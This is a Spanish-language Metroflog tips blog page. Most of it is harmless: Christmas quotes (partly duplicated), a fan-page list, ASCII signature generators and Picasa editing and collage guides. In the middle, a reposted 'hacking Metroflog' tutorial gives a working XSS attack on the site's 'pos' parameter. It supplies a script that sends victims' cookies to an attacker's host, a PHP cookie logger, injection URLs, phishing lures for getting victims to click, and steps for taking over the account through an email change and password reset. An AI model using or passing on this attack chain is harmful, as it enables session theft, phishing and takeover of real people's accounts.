Postal animada para metroflog

Les traemos un super recurso para metroflog!!! Se trata de una postal animada donde pones la foto y cara de una persona y aparece en el video.

IMAGINATE!!! pues tomar la foto de cualquier amigo de tu metroflog o incluso tu foto y hacer un video del que todos se van a reir!!.

Sn sitio muy divertido con postales navideñas donde podras subir fotos de tus amigos y la web creara un vídeo con gente bailando pero con la foto de tu amigo o tuya.

Entra aquihttp://cardfunk.com y has tu postal. Les dejamos un video de demostración.

Categoria: General

Frases de Navidad 2009 para metroFLOG

Honraré la Navidad en mi corazón y procuraré conservarla durante todo el año. (Charles Dickens)
Ojala pudiesemos meter el espiritud de navidad en jarros y abrir un jarro cada mes del año. (Harlan Miller)
La Navidad no es un momento ni una estación, sino un estado de la mente. Valorar la paz y la generosidad y tener merced es comprender el verdadero significado de Navidad. (Calvin Coolidge)
Tal vez el mejor adorno de navidad es una gran sonrisa.
Si no sabes qué regalar a tus seres más queridos en Navidad, regáleles tu amor.
Bendita sea la fecha que une a todo el mundo en una conspiración de amor. (Hamilton Wright Mabi)
No existe la Navidad ideal, solo la Navidad que usted decida crear como reflejo de sus valores, deseos, queridos y tradiciones. (Bill McKibben)
¿Qué es la Navidad? Es la ternura del pasado, el valor del presente y la esperanza del futuro. Es el deseo más sincero de que cada taza se rebose con bendiciones ricas y eternas, y de que cada camino nos lleve a la paz. (Agnes M. Pharo)
¡Feliz, feliz Navidad, la que hace que nos acordemos de las ilusiones de nuestra infancia, le recuerde al abuelo las alegrías de su juventud, y le transporte al viajero a su chimenea y a su dulce hogar! (Charles Dickens)
Viene cada año y vendrá para siempre. Y con la Navidad vienen los recuerdos y las costumbres. Esos recuerdos cotidianos humildes a los que todas las madres nos agarramos. Como la Virgen María, en los rincones secretos de su corazón. (Marjorie Holmes)
Mejor que todos los regalos debajo del árbol de navidad es la presencia de una familia feliz.
Aunque se pierdan otras cosas a lo largo de los años, mantengamos la Navidad como algo brillante.…. Regresemos a nuestra fe infantil. (Grace Noll Crowell)
La Navidad! La propia palabra llena nuestros corazones de alegría. No importa cuánto temamos las prisas, las listas de regalos navideños y las felicitaciones que nos queden por hacer. Cuando llegue el día de Navidad, nos viene el mismo calor que sentíamos cuando éramos niños, el mismo calor que envuelve nuestro corazón y nuestro hogar. (Joan Winmill Brown)
La Navidad…..no es un acontecimiento, sino una parte de su hogar que uno lleva siempre en su corazón. (Freya Stark)
Para los buenos momentos, gratitud.
Para los malos, mucha esperanza.
Para cada día, una ilusión.
Y siempre, siempre, felicidad.
Esto es lo que te deseo para el 2008. (Mari Carmen)

No existe la Navidad ideal, solo la Navidad que usted decida crear como reflejo de sus valores, deseos, queridos y tradiciones. (Bill McKibben)

Tal vez el mejor adorno de navidad es una gran sonrisa.

La Navidad no es un momento ni una estación, sino un estado de la mente. Valorar la paz y la generosidad y tener merced es comprender el verdadero significado de Navidad. (Calvin Coolidge)

Ojala pudiesemos meter el espiritud de navidad en jarros y abrir un jarro cada mes del año. (Harlan Miller)

Honraré la Navidad en mi corazón y procuraré conservarla durante todo el año. (Charles Dickens)

Bendita sea la fecha que une a todo el mundo en una conspiración de amor. (Hamilton Wright Mabi)

¿Qué es la Navidad? Es la ternura del pasado, el valor del presente y la esperanza del futuro. Es el deseo más sincero de que cada taza se rebose con bendiciones ricas y eternas, y de que cada camino nos lleve a la paz. (Agnes M. Pharo)

¡Feliz, feliz Navidad, la que hace que nos acordemos de las ilusiones de nuestra infancia, le recuerde al abuelo las alegrías de su juventud, y le transporte al viajero a su chimenea y a su dulce hogar! (Charles Dickens)

Si no sabes qué regalar a tus seres más queridos en Navidad, regáleles tu amor.

Viene cada año y vendrá para siempre. Y con la Navidad vienen los recuerdos y las costumbres. Esos recuerdos cotidianos humildes a los que todas las madres nos agarramos. Como la Virgen María, en los rincones secretos de su corazón. (Marjorie Holmes)

Mejor que todos los regalos debajo del árbol de navidad es la presencia de una familia feliz.

Aunque se pierdan otras cosas a lo largo de los años, mantengamos la Navidad como algo brillante.…. Regresemos a nuestra fe infantil. (Grace Noll Crowell)

La Navidad! La propia palabra llena nuestros corazones de alegría. No importa cuánto temamos las prisas, las listas de regalos navideños y las felicitaciones que nos queden por hacer. Cuando llegue el día de Navidad, nos viene el mismo calor que sentíamos cuando éramos niños, el mismo calor que envuelve nuestro corazón y nuestro hogar. (Joan Winmill Brown)

La Navidad…..no es un acontecimiento, sino una parte de su hogar que uno lleva siempre en su corazón. (Freya Stark)

Para los buenos momentos, gratitud.

Para los malos, mucha esperanza.

Para cada día, una ilusión.

Y siempre, siempre, felicidad.

Esto es lo que te deseo para el 2008. (Mari Carmen)

Categoria: General Tags:

Tutorial para hackear metroflog(xSS EN METROFLOG)

Este tutorial es bueno y me lo encontre en este blog: http://trucosmf2009. blogspot.com/

Disfrutenlo.

.:: Introduccion ::..

Pues este sera al primer tutorial que pondre aqui en mi blog, y al parecer sera uno muy bueno. Si se ponen a buscar en internet (llamese San Google) acerca de como hackear Metroflog, dudo que encuentren algo verdaderamente bueno, como esto que les voy a poner. Si llegan a encontrar algo sera o un Scam o que existe la vulnerabilidad XSS, que es la que ya habia publicado desde el año pasado.

El Scam se vuelve una tecnica complicada comparada contra esto que les voy a poner aqui. Ademas ya la gente no es tan tonta como para caer en los Scam (ahahaha, es broma, la neta hay muchisima todavia xD).

Esta tecnica que voy a explicar aprovecha la vulnerabilidad XSS, que es un error que se encuentra un muchas otras paginas, asi que el procedimiento, funciona para cualquier otra pagina con el mismo error, por lo que lo que les voy a poner no es ningun truco nuevo, simplemente intento dejar claro, como se llevaria a cabo en el caso de Metroflog.

..:: Entendiendo la Vulnerabilidad XSS ::..

Antes de empezar a explicar como aprovechar la vulnerabilidad, entendamos como es. El XSS segun Wikipeda es “un tipo de inseguridad informática o agujero de seguridad basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado.” No manchen, se escucha chido, pero no se si se entendio, asi que tratare de explicarlo con mis palabras.

El XSS es un error de programacion en paginas web, a traves del cual se puede hacer una inyeccion de codigo en HTML o Javascript, a traves de una variable que utilice la misma pagina web. Por la misma naturaleza de esos lenguajes de programacion, sabemos que no pueden afectar directamente al servidor donde se encuentra alojada esa pagina Web, y sabemos que solo se ejecutaran de manera local en donde hayamos hecho la inyeccion.

En el caso de Metroflog, la variable que es vulnerable es la variable “pos”. Esta variable se vuelve visible para nosotros cuando damos en click en una de las fotos pequeñas que aparecen arriba en los metroflogs, que vienen siendo las fotos anteriores. Si entramos directamente al metroflog, no veremos esta variable en nuestro explorador.

Hasta ahi, al parecer no es una vulnerabilidad grave, pero creanme, lo es. Y se vuelve mas grave, cuando en la pagina web se manejan coockies (no pienso explicar que son las coockies), y por lo general manejamos coockies en las webs donde nos podemos registrar (hotmail, gmail, yahoo, metroflog, blogspot, una infinidad de paginas, etc).

..:: El ingenio del ataque XSS ::..

Bien, ahora viene la parte ingeniosa de este ataque: si el codigo inyectado solo puede ser HTML o Javascript, y solo es de manera local ¿Como Hackeo un Metroflog con eso?. Bien veamos la cadenita.

Alguien alguna vez me dijo que a este metodo de analisis se le llamaba “Reduccion a lo absurdo” y funciona de esta forma:

Quiero llegar a Hackear un metro, ese es el objetivo final, y puedo lograrlo de dos formas: o conociendo la contraseña o conociendo los valores de todas las coockies. Este metodo esta encaminado a las coockies y entonces asi lo explicare, aunque de todos modos mas adelante explico como sacar la contraseña tmb (h).

Bien, ya se que obteniendo las coockies, hackeare ese metro, pero ¿Como obtengo las cookies?. Pues con codigo Javascript es posible acceder a esos valores, a traves de document.cookie que es una como variable que guarda los valores de las cookies.

Hasta aqui como que ya va agarrando forma. Pero si accedo a document.cookie inyectando codigo en mi computadora, pues solo vere mis coockies. Y si hago (que no es facil, pero mas abajo explico el metodo) que alguien mas inyecte ese codigo en su computadora, pues solo lo veran ellos =O. Este es un nuevo problema, ¿Como le hago para que esa persona inyecte ese codigo en su computadora, pero que yo tambien pueda ver el valor de esas coockies?

Este nuevo dilema lo podriamos resolver, si de alguna forma ejecutaramos PHP tambien, ya que PHP si se ejecuta directamente en el servidor, de esa forma, el valor de esas cookies las podriamos guardar en otro archivo que se encuentre en el mismo servidor. Ahora un nuevo dilema ¿Como ejecuto PHP desde Javascript? ¿Es posible?

La respuesta es “Si!” xD. Utilizando una pequeña redireccion en javascript, podemos linkear a un codigo en PHP, y a traves del metodo GET pasarlo a alguna variable que este contenida en nuestro archivo PHP y asi almacenarlo en un nuevo archivo, al cual nosotros tenemos acceso. Esa fue la rapida explicacion del ingenio de esta tecnica, que no es elite ni h4x0r en ningun sentido, cabe destacar eso.

..:: ¿Que se necesita para poner en practica esta tecnica? ::..

Pues lo que necesitamos para hackear un metro es lo siguiente:

* Metroflog de nuestra victima
* Su cuenta de correo (Esto es opcional, ahorita explico por que, aunque tener el correo es la mejor opcion)
* Un archivo en javascript
* Un archivo en PHP
* Hosting para almacenar los archivos.

..:: Aplicando nuestra tecnica de manera detallada::..

Bien, primero una ves entendida la explicacion, vayamos a lo bueno: los codigos. Estos codigos no son nuevos, ni mucho menos, de hecho es muy facil encontrarlos en muchisimas paginas, el hecho es saberlos utilizar bien.

El codigo en javascript es una sola linea de codigo y seria el siguiente:

window.location=’http://www.tu-host.com/roba_cookies.php?cookie=’+document.cookie

Esa linea de codigo la guardamos con extension .js, y le damos el nombre que sea, en este caso yo la llamare “redireccion.js”. Si nos damos cuenta, utiliza la funcion windows.location, que sirve para direccionar; ahi nos esta mandando al archivo php que se llama “roba_cookies.php” y que tiene una variable llamada coockies que toma el valor de “document.cookie”, es decir las cookies de metroflog de nuestra victima =).

NOTA: el codigo del siguiente archivo php debe llevar en la primera linea de codigo el “<” seguido de “?”, solo que no se lo puse ya que al parecer se interpreta. Ahora veamos como seria el codigo del archivo “roba_cookies.php”:

$cookies = $_GET['cookies'];
$guardando = fopen(“cookies.txt”,”a”);
$ip = $_SERVER['REMOTE_ADDR'];
$hora = date(“G:H:s”);
fwrite($guardando, “IP: $ip \n”);
fwrite($guardando, “Hora: $hora \n”);
fwrite($guardando, “Valores de las cookies: \n”);
fwrite($guardando, “$cookies \n”);
fclose($guardando);
?>

¿Lo explico? Ok, lo hare linea por linea. Primero a traves del metodo GET le da el valor a $cookies con el valor de document.coockie. Despues ejecuta la accion de abrir y poder escribir en un archivo llamado cookies.txt. Obtiene la IP de nuestra victima. Obtiene la Hora actual del servidor. Escribe la IP. Escribe la Hora. Escribe “Valores de las cookies:”. Escribe el valor de las cookies.

Bien. ya tenemos los codigos que necesitamos. Pero ahora necesitamos algo mas, el link que realiza la inyeccion del codigo javascript. Voy a utilizar la pagina de alguien desconocido como ejemplo, aunque no le haremos daño a su metro, solo sera para que vean como funcionan las inyecciones.

Usemos el metro de Claudia xD: 

Y veamos que exite el link 

Si nos fijamos, la variable “pos” es la fecha de publicacion de esa foto 22 de noviembre del 2008. Bueno, eso no nos interesa, haha, solo era un comentario. Existe otra variable llamada nf, que la verdad no nos ayuda ni nos perjudica.

Veamos con un ejemplo como funciona esta inyeccion: http://www.metroflog.com/dangerously-cute/20081122/?pos=%22%3E%3Cscript%3Ealert(/Owned%20by%20mx0x/)%3C/script%3E

Si damos click, en el link anterior, nos abre el metro y nos salta un mensaje. Justamente eso hace la funcion alert de javascript. Es solo una forma de comprobar la vulnerabilidad. Ahora vayamos al link que nos interesa, la Poisoned URL, haha, bueno, la URL que nos direccion al codigo en javascript.

http://www.metroflog.com/dangerously-cute/20081122/?pos=%22%3E%3Cscript src=”http://www.tu-host.com/redireccion.js”>

Va de nuevo, dando click en el link anterior, nos hace llegar al metro, pero rapidamente, nos redireccion al archivo en javascript, que nuevamente, nos manda al archivo php que guarda los valores de las coockies en un archivo de texto, al cual tenemos acceso.

El archivo de texto que almacena las cookies guardaria cada registro de la siguiente manera:

IP: 127.0.0.1
Hora: 8:08:49
Valores de las cookies:
__utma=18306213.2086185802.1223149270.1231378158.1231397360.68; __utmz=18306213.1231378158.67.30….

..:: ¿Como le hago para hacer que la otra persona entre en ese link tan raro? ::..

Es facil jo jo. Puede ser de mil formas, pero una que se me ocurre es la siguiente. Cuando alguien sube una foto a un metro, algunas de las veces, se spamea el correo de sus contactos con un correo que dice “Te invito a ver mi Metroflog” o algo asi. Entonces podemos enviar un correo de esos, donde diga lo mismo, pero modificando el link, de modo que parezca normal, pero que al darle click nos mande al link con el codigo.

El link podria ser como este: http://www.metroflog.com/dangerously-cute A simple vista parece que solo nos manda al metro, pero al darle click nos ejecute el codigo. Muy poca gente, se daria cuenta de que en la barra de abajo del explorador aparece la direccion completa. Bien esa es una forma, pero se pueden ingeniar muchas otras, como por ejemplo cambiar los caracteres por su valor en ascii, ocultando los links.

..:: Ya tengo los valores de las cookies ¿Y ahora? ::..

Pues lo que sigue es crearse la cookie, para eso recomiendo usar FireFox y el addon de Cookie Editor (xD?). De esa forma sera tan facil como editar un campo de texto por cada cookie. Con el editor veremos listada cada variable, al darle click a una de ella, nos mostrara su valor en la parte que dice content. Solo sera cuestion de darle al boton de Edit y cambiar ese valor, por los valores almacenados por el archivo PHP. Se debe de ver algo mas o menos como se muestra en la siguiente imagen:

Una vez editadas todas las cookies con los valores guardados, refrescamos el metroflog, y automaticamente estaremos logeados como ese usuario xD. Y sin necesidad de conocer su contraseña, esto es muy importante. Ahora ya podremos hacer lo que sea: subir fotos, borrar comentarios, cambiar colores, postear en otros metros con ese usuario, etc.

Este es un metro que ownee desde el año pasado, cuando andaba checando esta vulnerabilidad, aqui les dejo el screen:

http://i155.photobucket.com/albums/s292/FhUrER/ownedtifaa.jpg

..:: Ya tengo las cookies y ya hice maldades, pero quiero mas ¿Como obtengo la contraseña? ::..

Metroflog tiene otro detalle, que podria considerarse como error. Una vez logeado como el usuario podremos acceder al panel, pero no podremos cambiar la contraseña, ya que nos pide la contraseña actual, la cual no conocemos x_x. Sin embargo, podemos cambiar el correo, jo jo. Cambiamos el correo por uno nuestro, para realizar este cambio no nos pide la contraseña, solo una pequeña comprobacion que es enviada a nuestro correo.

Una vez cambiado el correo, le damos en Log Out o en Salir. Y vamos a www.metroflog.com y le damos en Olvidaste tu contraseña? (xD). Ahi nos pide el e-mail, que ya es el nuestro, le damos en Enviar y listo!! la contraseña nos llegara asi de facilmente a nuestro correo =) Ahora ya tenemos totalmente owneada la cuenta de metroflog, ya que asi ya podemos cambiar la contraseña.

..:: Comentarios finales ::..

Pues solo quiero comentar que “no hagas, lo que no te gustaria que te hicieran, aunque si estas seguro de que no te lo pueden hacer, entonces hazlo xD”. Este metodo, como se habran dado cuenta es basicamente hacer click sobre un link y listo, tu metroflog sera owneado. Asi que tengan cuidado!, fijense en donde hacen click, porque en una de esas te tumban el metro. Por eso no usen esas cosas, usen Blogs, y recomiendo Blogspot, la verdad. Luego hare un post de MetroFlog VS Blogspot y veran que paliza!! hahaha. Bien, este es un verdadero metodo de como hackear una cuenta de MetroFlog, espero haber sido lo suficientemente explicito, espero que les sea util y les haya gustado.

NOTA: Ya lo habia dicho, esto no es elite, no te vuelve hacker. De hecho tal vez no debi haber usado la palabra “hack”, simplemente es ownear una cuenta.

Categoria: manuales Tags:

Lista de metroflog de Crepusculo

Vamos a crear una nueva seccion donde uds ponen su metroflog en los comentarios si corresponde a la categoria esta es de crepusculo, ya que hay demasiados metroflogs de esto y hay mucha gente que le gusta ver las fotografias aqui ponganlos si tienen uno de estos.

Publicaremos aqui mismo la lista que vayan poniendo!!!


http://www.metroflog.com/—-creepusculo—-

http://www.metroflog.com/______twilight______

http://www.metroflog.com/TNEB-EdwardCullen

¿Como crear tus propias firmas llamativas?

Si las firmas que has encontrado en la página no te gustan, aqui te traigo algunos generados ascii con los que podras crear tus propias firmas llamativas para tu metroflog.

Creación de Texto:

http://www.network-science.de/ascii/

En ese sitio basta solo con poner el texto y escoger una fuente y generalo. Es muy divertido! Yo cree este texto:

El siguiente sitio es el mejor, por que te crea una firma apartir de una imagen ¿Imagina que no puedes hacer con esto?. Impresionaras a tus amigos al tener firmas originales y con calidad.


http://ascii.techhappens.com/

Si quieres escribir un comentario o saber mas sobre este tema.

Visita el foro: http://tumetro.com/foro/index.php?topic=73.0

Edicion de imagenes para metroflog

Seguimos con tutoriales para la edicion de imagenes con picasa.

Como ya se vio es un programa simple y facil de descargar e instalar,Si no lo tienes solo descargalo.


La edicion de imagenes basica es simple y hace que se vean muy lindas tus fotos para el metroflog o fotolog

1.- Escoge ahora una fotografía haciendo doble clic sobre ella. A continuación, la imagen aparece ampliada y tmbn una paleta para editar con tres pestañas.

La primera de ellas, Arreglos básicos, se encarga de realizar pequeñas modificaciones, como recortes , corrección de ojos rojos o nivelación automática del contraste y del colores cuestion de que juegues con estos parámetros para ver cómo se puede mejorar tu fotografía.

La segunda pestaña, Perfecc., sirve para regular ajustes más precisos relacionados con la luz y las sombras de la instantánea, así como con la intensidad del color. Por ejemplo, arrastra hacia la derecha el indicador de Luz de relleno para aclarar la fotografía.

En tercer lugar, Efectos, incorpora una serie de filtros de acabado final que cambian por completo la presentación de la imagen, juegas con las opciones fijate cual te gusta mas para que escogas bn.

importante:Una vez realizados todos los cambios puedes guardar la nueva imagen sin eliminar la anterior. Busca en el menú s Archivo y, dentro da click en la opción Guardar una copia.

Por otr parte Picasa nos permite añadir títulos a imagenes en la pantalla “Editar imagen”. Debajo de la imagen en cuestión, haz clic en el texto “Crear un título” y escribe su título. Puedes mostrar u ocultar el título de la fotografía utilizando el botón de la izquierda. Para borrar el título, basta con hacer clic en el icono de papelera que aparece a la derecha.

Vea tambn� Como crear un collage para metroflog,�

Como crear un collage para metroflog?

Hay varios programas para crear collage, como photoshop, fireworks, corel, pero suelen ser un poco dificiles o complicados para unas personas,� hay un programa mas simple, picasa.

Picasa es un programa que sirve de mucho, no solo para hacer collage si no para editar fotos, es muy sencillo, su descarga es muy rapida pq pesa muy poco y no ocupa mucho espacio, asi que es el programa ideal para hacer collage para tu metroflog.

Como hacer un collage para metroflog o fotolog?

Asi que si quieres hacer un collage de manera rapida y sencilla solo tienes que seguir unos sencillos pasos:

1.- Descarga solo picasa:

2.- Corre el programa, una vez que lo corras se importaran todas tus fotos dentro de picasa, ya que busca las imagenes por si solo, no las tienes que meter tu :o .

3.- Seleciona las fotos para el collage (Para seleccionar puedes presionar la tecla Control, solo sostenla y Da click en las fotos sin dejar de sostenerla o puedes presionarla y tambien presionar el boton Hold para seleccionar tus fotos de multiples albums que tengas).

4.- Selecciona la opción collage.

5.- Se abrirá una ventana nueva con las fotos que seleccionaste anteriormete.

6.- Configura como prefieras el collage ya que hay varios tipos, la primera opcion que te dan los menus es Type,� que es para ver los diferentes tipos de collage, asi elige el que mas te agrade, y la segunda es para ver que puedes poner de fondo, puedes poner una foto o ya sea negro o blanco� tu eliges es cuestion de ver las opciones,� la tercera opcion del menu es para ver donde puedes guardar tu imagen.

Importante: si te fijas puedes dar click en la imagen y asi puedes cambiar el orden de tus pics.

7.- Cuando ya� este listo como lo quieres solo da click en la opcion Create.